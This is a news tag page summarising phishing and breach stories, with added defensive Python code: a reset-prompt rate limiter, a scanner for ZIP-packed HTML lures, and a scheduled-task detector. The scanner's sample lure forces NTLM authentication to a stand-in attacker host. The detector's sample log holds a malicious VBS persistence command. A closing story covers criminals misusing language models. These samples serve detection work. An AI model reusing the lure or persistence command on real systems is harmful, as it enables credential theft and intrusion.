Phishing Attacks

All articles tagged with #phishing attacks

Urgent Chrome Security Flaws Exploited by Notorious Hacker Groups and Spyware Vendors

Originally Published 2 months ago — by CyberSecurityNews

A Chrome zero-day (CVE-2025-2783, a sandbox-escape bug in the browser's Mojo IPC layer on Windows) was exploited by the hacker group Mem3nt0 mori to infect high-profile targets in Russia and Belarus with the LeetAgent spyware. Victims were reached with tailored phishing emails; clicking the link was enough to trigger the exploit in the browser. Google patched the flaw shortly after it was reported, but the campaign shows how quickly advanced persistent threats and the commercial spyware market put browser bugs to use. Users should update Chrome promptly (chrome://settings/help shows the installed version and pulls the update) and watch for unexpected processes or network connections after a browser crash or a suspicious link.

"Apple Users Beware: MFA Bombing Attack Prompts Endless Password Resets"

Originally Published 1 year ago — by Ars Technica

Attackers are bombarding iPhone users with a flood of system-level "Reset Password" prompts, then following up with spoofed calls from "Apple Support" that try to talk the victim into reading back the password-reset code. The technique, known as MFA fatigue or MFA prompt bombing, relies on the user eventually tapping Allow by mistake or out of exhaustion; because the prompts are genuine Apple notifications, they cannot be told apart from a legitimate reset. The root cause is that Apple's password-reset flow lets anyone who knows the account's phone number request resets in a loop, and the rate limit that should cap them did not stop the flood in the reported cases. Experts recommend strict rate limiting on reset requests and FIDO-based, phishing-resistant MFA. Users should tap Don't Allow on every unexpected prompt, never share a reset or verification code with a caller, and remember that Apple does not call customers unsolicited.
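The rate limiting the experts above recommend is easy to state and easy to get wrong. The following is an added example (not Apple's code and not from the Ars Technica article) of a sliding-window limiter for reset prompts with a cool-down: after a small number of prompts in a short window, further requests for that account are refused for an hour, so a bombing run cannot keep the victim's devices ringing. The thresholds, the account identifier and the simulated attack timing are all assumptions chosen for illustration.

```python
"""Sliding-window limiter for password-reset / push-MFA prompts (added example)."""
from collections import deque
import time


class ResetPromptLimiter:
    """Allow at most `max_prompts` prompts per account in any `window_s` seconds.

    Exceeding the limit puts the account into a cool-down of `cooldown_s`
    seconds during which every further request is refused, so an attacker
    cannot keep a target's devices ringing by submitting resets in a loop.
    The thresholds are illustrative assumptions, not any vendor's values.
    """

    def __init__(self, max_prompts=3, window_s=600, cooldown_s=3600,
                 clock=time.monotonic):
        self.max_prompts = max_prompts
        self.window_s = window_s
        self.cooldown_s = cooldown_s
        self.clock = clock                 # injectable for deterministic tests
        self._events = {}                  # account -> deque of request times
        self._cooldown_until = {}          # account -> time the cool-down ends

    def allow(self, account):
        """Return True if a prompt may be sent for `account` right now."""
        now = self.clock()
        if self._cooldown_until.get(account, 0.0) > now:
            return False
        q = self._events.setdefault(account, deque())
        while q and now - q[0] >= self.window_s:   # drop entries outside the window
            q.popleft()
        if len(q) >= self.max_prompts:
            # Limit hit: start the cool-down and reset the window.
            self._cooldown_until[account] = now + self.cooldown_s
            q.clear()
            return False
        q.append(now)
        return True


def simulate_bombing(n_requests, spacing_s=2.0):
    """Replay a constructed bombing run of `n_requests` reset attempts against
    one account, `spacing_s` seconds apart, and return (sent, refused)."""
    fake_now = [0.0]
    limiter = ResetPromptLimiter(clock=lambda: fake_now[0])
    sent = refused = 0
    for _ in range(n_requests):
        if limiter.allow("victim@example.com"):    # placeholder account id
            sent += 1
        else:
            refused += 1
        fake_now[0] += spacing_s
    return sent, refused


if __name__ == "__main__":
    print("prompts sent / refused:", simulate_bombing(100))
```

With the defaults, a run of 100 requests two seconds apart delivers three prompts and refuses the remaining 97. The trade-off is that a legitimate user who fumbles a reset three times is also locked out for the cool-down period; in production the key would include the requesting IP or device as well as the account, and the state would live in a shared store rather than in process memory.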

"Phishing Attacks Target Windows NTLM Authentication with Weaponized ZIP File"

Originally Published 1 year ago — by BleepingComputer

The threat actor TA577 has pivoted to phishing emails designed to capture NTLM authentication material from employees at organisations worldwide. Each message carries a unique ZIP archive containing an HTML file; when opened, the HTML forces Windows to connect to an attacker-controlled SMB server, and the victim's machine authenticates automatically, handing over the username and NTLMv2 challenge-response. Those responses can be cracked offline to recover the password or relayed to other services that accept NTLM (pass-the-hash needs the raw NT hash, which this technique does not yield), either way giving the attacker a foothold for account takeover, access to sensitive data and lateral movement inside the network. Mitigations include blocking outbound SMB (TCP 445) at the perimeter, Windows policies that restrict or block NTLM (Windows 11 can block NTLM over SMB outright), email filtering that strips or detonates HTML-bearing archives, and MFA on the services those credentials would unlock.
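The lure works because an HTML file can point the browser at a UNC or file:// resource, which Windows resolves over SMB and authenticates to without asking. The scanner below is an added example (not Proofpoint's, BleepingComputer's or the actor's code) that unpacks a ZIP attachment in memory and flags any HTML inside that references a file://, smb:// or UNC target through a meta refresh or a src/href attribute. The archive, the file names and the attacker address 203.0.113.5 (a documentation address) are constructed for the example.

```python
"""Flag ZIP-packed HTML that would force an outbound SMB authentication (added example)."""
import io
import re
import zipfile
from html.parser import HTMLParser

# URL forms that make Windows open an authenticated SMB/WebDAV session. A
# schemeless //host/share inside a file:// document also resolves to a UNC path.
LEAK_URL = re.compile(r"^\s*(file:|smb:|\\\\|//)", re.IGNORECASE)
HTML_EXTS = (".htm", ".html", ".xhtml", ".mht")


class LeakFinder(HTMLParser):
    """Collect (tag, url) pairs whose target would trigger NTLM authentication."""
    REF_ATTRS = {"src", "href", "data", "action", "background"}

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)            # attribute names arrive lower-cased
        candidates = []
        if tag == "meta" and (attrs.get("http-equiv") or "").lower() == "refresh":
            # content="0; url=file://..." -> take the part after url=
            m = re.search(r"url\s*=\s*['\"]?([^'\"]+)", attrs.get("content") or "", re.I)
            if m:
                candidates.append(m.group(1))
        candidates += [v for k, v in attrs.items() if k in self.REF_ATTRS and v]
        for url in candidates:
            if LEAK_URL.match(url):
                self.hits.append((tag, url.strip()))


def scan_zip(data):
    """Return [(member, tag, url)] for every leak-inducing reference in the archive."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(HTML_EXTS):
                continue
            finder = LeakFinder()
            finder.feed(zf.read(info).decode("utf-8", errors="replace"))
            hits += [(info.filename, tag, url) for tag, url in finder.hits]
    return hits


def build_sample_zip():
    """Constructed attachment: one lure HTML plus one benign HTML, zipped in memory."""
    lure = ('<html><head><meta http-equiv="refresh" '
            'content="0; url=file://203.0.113.5/s/x.txt"></head>'
            '<body>Loading document...</body></html>')
    benign = '<html><body><a href="https://example.com/">ok</a></body></html>'
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Invoice_4471.html", lure)     # placeholder lure name
        zf.writestr("readme.html", benign)
    return buf.getvalue()


if __name__ == "__main__":
    for member, tag, url in scan_zip(build_sample_zip()):
        print(f"NTLM-leak reference in {member}: <{tag}> -> {url}")
```

The check is deliberately cheap so it can run inline in a mail gateway; it is a complement to, not a substitute for, blocking outbound 445 at the edge, since an attacker can also reach the same effect through WebDAV over port 80 when SMB is blocked.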

"Iranian Hackers Use Poisoned VPN Apps to Target Mideastern Policy Experts"

Originally Published 1 year ago — by The Hacker News

Iranian threat actor Charming Kitten (APT35), linked to Iran's Islamic Revolutionary Guard Corps (IRGC), has targeted Middle East policy experts with a new backdoor called BASICSTAR, luring victims through fake webinar portals and social engineering. The group has a long record of deploying custom backdoors and malware against high-profile individuals working on Middle Eastern affairs. The phishing campaign impersonated legitimate organisations and used compromised email accounts, consistent with the group's persistent surveillance of its targets. Separately, Recorded Future documented IRGC targeting of Western countries through a network of contracting companies that specialise in surveillance and offensive technologies.

Ukrainian Firms Under Attack: WinRAR Exploit Unleashes LONEPAGE Malware

Originally Published 2 years ago — by The Hacker News

The threat actor UAC-0099 has been targeting Ukrainian firms with the LONEPAGE malware, in part by exploiting a high-severity WinRAR vulnerability (CVE-2023-38831). The phishing messages carry HTA, RAR and LNK attachments; the chain runs PowerShell, which registers a scheduled task that executes a VBS file, and LONEPAGE itself is a VBS implant that fetches further payloads. CERT-UA reports that UAC-0099 gained unauthorised remote access to several dozen computers in Ukraine. In the WinRAR variant, self-extracting archives and ZIP files deliver an archive crafted so that opening the harmless-looking document inside runs a script instead. Separately, CERT-UA warned of a new wave of phishing messages, attributed to UAC-0050, spreading the Remcos RAT.
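The persistence step in that chain (PowerShell registering a scheduled task that runs a VBS file from a user-writable directory) is a good detection hook because benign software rarely does it. The following is an added example, not from CERT-UA, Deep Instinct or The Hacker News, of that detection logic run over constructed process-creation records in the key=value shape of a Sysmon Event ID 1 export; the task name, user name and script path are placeholders.

```python
"""Detect schtasks /create of a .vbs under a user-writable path (added example)."""
import re

# Paths a standard user can write to; a task that runs a script host from here is
# far more suspicious than one whose target sits under Program Files or System32.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Users\\Public|ProgramData)\\", re.I)
SCRIPT_HOST = re.compile(r"\b[wc]script(\.exe)?\b", re.I)
VBS_PATH = re.compile(r"[A-Za-z]:\\[^\"']*?\.vbs\b", re.I)
CREATE_FLAG = re.compile(r"(^|\s)/create\b", re.I)
POWERSHELL = ("\\powershell.exe", "\\pwsh.exe")

# Constructed sample records, not real telemetry.
SAMPLE_LOG = [
    r'EventID=1 | ParentImage=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
    r' | Image=C:\Windows\System32\schtasks.exe'
    r' | CommandLine=schtasks.exe /create /sc minute /mo 3 /tn Updater'
    r' /tr "wscript.exe C:\Users\olena\AppData\Local\Temp\update.vbs" /f',
    r'EventID=1 | ParentImage=C:\Windows\explorer.exe'
    r' | Image=C:\Windows\System32\schtasks.exe'
    r' | CommandLine=schtasks.exe /create /sc daily /tn Backup /tr "C:\Program Files\Backup\run.exe"',
    r'EventID=1 | ParentImage=C:\Windows\System32\cmd.exe'
    r' | Image=C:\Windows\System32\schtasks.exe'
    r' | CommandLine=schtasks.exe /query /tn Backup',
    r'EventID=1 | ParentImage=C:\Windows\explorer.exe'
    r' | Image=C:\Windows\System32\schtasks.exe'
    r' | CommandLine=schtasks.exe /create /sc hourly /tn Job'
    r' /tr "cscript.exe C:\Program Files\Tools\job.vbs"',
]


def parse_line(line):
    """Split 'Key=Value | Key=Value' into a dict; values may contain '=' themselves."""
    return dict(part.split("=", 1) for part in line.split(" | ") if "=" in part)


def classify(ev):
    """Return an alert dict for a suspicious task registration, else None."""
    image = ev.get("Image", "").lower()
    cmd = ev.get("CommandLine", "")
    if not image.endswith("\\schtasks.exe") or not CREATE_FLAG.search(cmd):
        return None
    if not SCRIPT_HOST.search(cmd):              # action must invoke wscript/cscript
        return None
    m = VBS_PATH.search(cmd)
    if not m or not USER_WRITABLE.search(m.group(0)):
        return None                              # .vbs outside user-writable dirs: ignore
    parent = ev.get("ParentImage", "").lower()
    severity = "high" if parent.endswith(POWERSHELL) else "medium"
    return {"severity": severity, "vbs": m.group(0), "parent": parent, "command": cmd}


def detect(lines):
    """Run classify() over raw log lines and return the list of alerts."""
    alerts = []
    for line in lines:
        hit = classify(parse_line(line))
        if hit:
            alerts.append(hit)
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(f"[{a['severity']}] {a['vbs']} registered via {a['parent']}")
```

Only the first record fires: a PowerShell parent, a schtasks /create, and a wscript action pointing into the user's Temp directory. The fourth record also registers a .vbs task but under Program Files, which the path check lets through; a real ruleset would pair this with Security event 4698 (task created), since an attacker can also register tasks through the COM API without ever spawning schtasks.exe.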

Okta Discloses Extensive Hack: All Customer Support Users Affected

Originally Published 2 years ago — by Krebs on Security

Okta, a major identity and authentication provider, has revised the impact statement for the recent breach of its customer-support system. It initially said attackers had stolen data belonging to fewer than 1% of its customers; it now acknowledges that the intruders also downloaded a report containing the names and email addresses of nearly every customer-support user. Most affected users had only a full name and email address exposed, but about 3% had additional fields compromised. Okta warns that many of those accounts belong to Okta administrators, who are prime targets for follow-on phishing, and urges them to enable MFA, preferably phishing-resistant methods, on their admin accounts. The breach traces back to an employee who saved the credentials of a service account in Okta's customer-support infrastructure to a personal Google account; that account was most likely compromised, exposing the credentials.

"CEO Reveals Unpopular but Vital Advice for Scam Protection"

Originally Published 2 years ago — by CNBC

Kyle Hanslovan, a cybersecurity CEO and former government hacker, calls multi-factor authentication the "single biggest thing you can do" to protect against scams and deter attackers. The advice is unpopular because the extra login step is inconvenient, which is why many people skip it. Hanslovan recommends an authenticator app over SMS or email codes, since those channels are easier to intercept or phish. Small businesses are especially exposed because they are rarely prepared for an attack. MFA raises the cost of an intrusion enough that most attackers move on to an easier target.

"Massive Data Breach Exposes 2.6 Million Duolingo Users to Hackers"

Originally Published 2 years ago — by BleepingComputer

Scraped data on 2.6 million Duolingo users, including email addresses and internal account fields, has been posted on a hacking forum, giving attackers what they need for targeted phishing. The data was collected through an exposed API: anyone who submitted a username received the matching profile, and feeding in an email address confirmed whether it belonged to a Duolingo account, so a list of addresses from earlier breaches could be bulk-checked and enriched. Duolingo confirmed the data was scraped from public profiles but did not address the non-public fields included in the dump. Companies tend to dismiss scraping as a non-issue, but mixing public and private data in this way raises the phishing risk and may breach data-protection law.

The Dark Web's Response to the AI Revolution: An Addictive Digital Drug

Originally Published 2 years ago — by BleepingComputer

The dark web is showing strong interest in the AI revolution, with threat actors discussing how language models could help with cybercrime, from finding 0-day exploits to drafting spear-phishing emails. Open source models are especially attractive because they have not undergone the reinforcement learning that trains commercial models to refuse risky or illegal requests. Threat exposure management firm Flare has identified more than 200,000 OpenAI credentials for sale on the dark web. The commodification of cybercrime and the growing capabilities of language models are converging, raising concern about how readily these models can be turned to criminal use.